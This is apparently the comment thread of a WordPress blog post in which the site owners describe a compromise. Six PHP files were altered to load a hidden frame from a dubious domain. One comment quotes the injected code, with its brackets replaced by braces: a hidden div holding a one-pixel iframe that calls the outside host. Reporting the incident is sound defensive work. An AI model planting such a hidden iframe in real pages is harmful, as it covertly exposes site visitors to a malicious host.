7 comments for “Attacked by the forces of evil

  1. It’s gone. Someone modified six files this afternoon (at 1:51 to be exact, just about four hours ago). All six files had a hidden frame installed on them, directing to the very dubious site “re6” dot net.

    The affected files were index.php, index.default.php, wp-comments-popup.php, misc.php, guests.php, and categories.php.

    The most damaging two were index and wp-comments-popup.

    I’m very curious as to how that bit of code got onto the site. Something stinks in Denmark. Perhaps someone with admin access is infected with something. More ominously, perhaps there’s a secuity hole in WP. The program’s choice of files is decidedly odd. Several of them are pages that only exist at T & S (like guests.php) so it may not be a program designed to sneak into wp. I really don’t know how we got hit, but in any case, it should be gone now.

  2. The code snippet that was inserted (right before the /body tag) was this: (replacing the greater-than and less-than signs with {} because I don’t want to put actual code here):

    {div style=”visibility: hidden; position: absolute; left: 1; top: 1″} //

    {iframe src=”http://re6.net/?s=1″ frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no} //

    {/iframe}{/div} //

Comments are closed.